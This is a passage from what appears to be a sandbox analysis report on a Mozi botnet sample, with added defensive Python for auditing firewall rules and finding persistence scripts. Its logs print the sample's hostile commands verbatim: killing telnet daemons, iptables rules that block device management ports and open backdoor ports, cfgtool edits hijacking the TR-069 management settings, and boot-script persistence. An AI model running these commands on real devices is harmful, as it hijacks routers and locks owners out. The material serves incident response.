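        if chain not in ("INPUT", "PREROUTING") or direction != "dst":
            continue                        # OUTPUT/POSTROUTING mirrors ignored
        if target == "ACCEPT":
            opened.add((proto, port))
        elif target in ("DROP", "REJECT"):
            blocked.add((proto, port))
    blocked_mgmt = {p for _, p in blocked if p in MANAGEMENT_PORTS}
    opened_high = {p for _, p in opened if p > 1024}
    return {
        "opened": opened,
        "blocked": blocked,
        "blocked_management": blocked_mgmt,
        # -I puts each rule at the head of the chain, so a DROP on a
        # management port wins over whatever ACCEPT the device shipped with.
        "lockout_pattern": bool(blocked_mgmt) and bool(opened_high),
    }


if __name__ == "__main__":
    for key, value in assess(OBSERVED_COMMANDS).items():
        print(key, "=", value)
```

              On a live device the same assessment can be run over `iptables -S` output after rewriting `-A` to the parser's expectations; the point of normalising both option spellings is that the sample's duplicate rules collapse to one entry per port instead of inflating the count.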
              Sample reads /proc/mounts (often used for finding a writable filesystem)
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /proc/4598/mounts
              Sample tries to persist itself using /etc/profile
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/profile.d/cedilla-portuguese.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/profile.d/apps-bin-path.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/profile.d/Z97-byobu.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/profile.d/bash_completion.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/profile.d/vte-2.91.sh
              Sample tries to persist itself using System V runlevels
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/rcS.d/S95baby.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/rc.local
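
              The paths above are the persistence points: a System V start script (/etc/rcS.d/S95baby.sh), /etc/rc.local, and the login scripts under /etc/profile.d, with the dropped binary /usr/networks (listed as a dropped file in the YARA match earlier on this page). The added example below is not from the report or from the sample; it is a small offline triage routine that walks those locations beneath a given root and reports indicator hits, which is the check an incident responder runs on a mounted firmware image or a suspect device. The file contents it writes into a temporary directory are constructed for the demonstration and are not the sample's real scripts.

```python
"""Offline triage of the boot and login persistence points (added example)."""
import os
import re
import shutil
import stat
import tempfile
from typing import List, Tuple

# Indicators from this report: the dropped binary, the System V script name
# and the Mozi.<arch> stage names.
IOC_RE = re.compile(r"/usr/networks|Mozi\.[a-z0-9]\b|S95baby\.sh")
IOC_SCRIPT_NAMES = {"S95baby.sh"}
DROPPED_BINARY = os.path.join("usr", "networks")


def persistence_files(root: str) -> List[str]:
    """rc.local, /etc/profile, every /etc/rcS.d and /etc/rcN.d entry and every
    /etc/profile.d script, all resolved beneath 'root'."""
    etc = os.path.join(root, "etc")
    candidates = [os.path.join(etc, "rc.local"), os.path.join(etc, "profile")]
    if os.path.isdir(etc):
        for entry in sorted(os.listdir(etc)):
            full = os.path.join(etc, entry)
            if os.path.isdir(full) and (entry == "profile.d" or re.fullmatch(r"rc[S0-6]\.d", entry)):
                candidates.extend(os.path.join(full, f) for f in sorted(os.listdir(full)))
    return [p for p in candidates if os.path.isfile(p)]


def triage_persistence(root: str = "/") -> List[Tuple[str, str]]:
    """Return (path, reason) findings; one file can yield more than one."""
    findings: List[Tuple[str, str]] = []
    for path in persistence_files(root):
        if os.path.basename(path) in IOC_SCRIPT_NAMES:
            findings.append((path, "init script name is a Mozi indicator"))
        try:
            with open(path, "r", errors="replace") as fh:
                hit = IOC_RE.search(fh.read())
        except OSError:
            continue
        if hit:
            findings.append((path, "references " + hit.group(0)))
    dropped = os.path.join(root, DROPPED_BINARY)
    if os.path.isfile(dropped):
        executable = bool(os.stat(dropped).st_mode & stat.S_IXUSR)
        findings.append((dropped, "dropped binary present, executable=%s" % executable))
    return findings


def build_demo_root() -> str:
    """Throwaway root with constructed contents (hypothetical, not the real
    scripts): two clean files, two with the indicator appended, one binary."""
    root = tempfile.mkdtemp(prefix="mozi-triage-")
    demo = {
        "etc/rc.local": "#!/bin/sh\nexit 0\n",
        "etc/profile.d/bash_completion.sh": ". /etc/bash_completion\n",
        "etc/profile.d/vte-2.91.sh": "# vte\n/usr/networks\n",
        "etc/rcS.d/S95baby.sh": "#!/bin/sh\n/usr/networks &\n",
        "usr/networks": "\x7fELF placeholder\n",
    }
    for rel, content in demo.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
    os.chmod(os.path.join(root, DROPPED_BINARY), 0o755)
    return root


if __name__ == "__main__":
    demo_root = build_demo_root()
    try:
        for path, reason in triage_persistence(demo_root):
            print(path, "->", reason)
    finally:
        shutil.rmtree(demo_root)
```

              Pass the mount point of an extracted firmware image or a forensic copy as `root`; reading the scripts rather than just listing them is what catches the case shown in the report, where the sample writes into profile.d files that legitimately exist on the system instead of adding a new one.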
              Terminates several processes with shell command 'killall'
              Source: /bin/sh (PID: 4602) | Killall command executed: killall -9 telnetd utelnetd scfgmgr
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/230/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/231/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/232/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/233/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/234/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3512/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/359/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/1452/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3632/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/4600/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3518/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/10/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/1339/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/11/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/12/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/13/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/14/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/15/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/16/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/17/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/18/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/19/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/483/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3527/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3527/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/1/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/2/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3525/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/1346/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3524/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3524/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/4/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3523/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/5/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/7/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/8/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/9/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/20/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/21/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/22/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/23/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/24/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/25/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/28/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/29/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/1363/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3541/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3541/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/1362/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/496/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/496/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/30/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/31/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/31/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/1119/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3790/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3791/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3310/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3431/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3431/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3550/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/260/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/263/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/264/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/385/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/144/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/386/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/145/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/146/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3546/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3546/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/147/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3303/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3545/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/148/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/149/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3543/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/822/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/822/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3308/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3308/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3429/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3429/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/47/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/48/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/48/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/49/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/150/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/271/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/151/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/152/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/153/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/395/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/396/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/154/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/155/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/156/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/1017/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/157/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/158/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/159/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3432/stat
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/3432/cmdline
              Source: /usr/bin/killall (PID: 4602) | File opened: /proc/50/stat
              Source: /tmp/mozi.a.zip (PID: 4600) | Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
              Source: /tmp/mozi.a.zip (PID: 4634) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4668) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4671) | Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4711) | Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4732) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4741) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4764) | Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4789) | Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4811) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4814) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4818) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4838) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4865) | Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
              Source: /tmp/mozi.a.zip (PID: 4875) | Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
              Source: /tmp/mozi.a.zip (PID: 4887) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4911) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4938) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4960) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4978) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4998) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5015) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5034) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5053) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5072) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5087) | Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5113) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5217) | Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5220) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5223) | Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5233) | Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5255) | Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5282) | Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5306) | Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5332) | Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"
              Source: /bin/sh (PID: 4638) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674) | Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718) | Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772) | Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793) | Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226) | Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242) | Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314) | Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Source: /tmp/mozi.a.zip (PID: 4625) | Reads from proc file: /proc/stat
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /usr/networks (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/mozi.a.zip (PID: 4598) | File written: /usr/networks
              Source: /tmp/mozi.a.zip (PID: 4598) | Shell script file created: /etc/rcS.d/S95baby.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | Shell script file created: /etc/init.d/S95baby.sh
              Source: submitted sample | Stderr:
                  telnetd: no process found
                  utelnetd: no process found
                  scfgmgr: no process found
                  Unsupported ioctl: cmd=0xffffffff80045705
                  Unsupported ioctl: cmd=0xffffffff80045705
                  Unsupported ioctl: cmd=0xffffffff80045705
                  /bin/sh: 1: cfgtool: not found
                  /bin/sh: 1: cfgtool: not found
                  qemu: uncaught target signal 11 (Segmentation fault) - core dumped
                  Unsupported ioctl: cmd=0xffffffff80045705
                  Unsupported ioctl: cmd=0xffffffff80045705
                  : exit code = 0

              Hooking and other Techniques for Hiding and Protection:

              Drops files in suspicious directories
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/S95baby.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/mountall.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/checkfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/umountnfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/mountkernfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/checkroot-bootclean.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/mountnfs-bootclean.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/bootmisc.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/checkroot.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/hwclock.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/hostname.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/mountdevsubfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/mountall-bootclean.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /etc/init.d/mountnfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /usr/bin/gettext.sh
              Source: /tmp/mozi.a.zip (PID: 4598) | File: /usr/sbin/alsa-info.sh
              Uses known network protocols on non-standard ports
              Source: unknown | Network traffic detected: HTTP traffic on port 56274 -> 52869
              Source: unknown | Network traffic detected: HTTP traffic on port 52869 -> 56274
              Source: unknown | Network traffic detected: HTTP traffic on port 45556 -> 49152
              Source: unknown | Network traffic detected: HTTP traffic on port 49152 -> 45556
              Source: unknown | Network traffic detected: HTTP traffic on port 39288 -> 49152
              Source: unknown | Network traffic detected: HTTP traffic on port 49152 -> 39288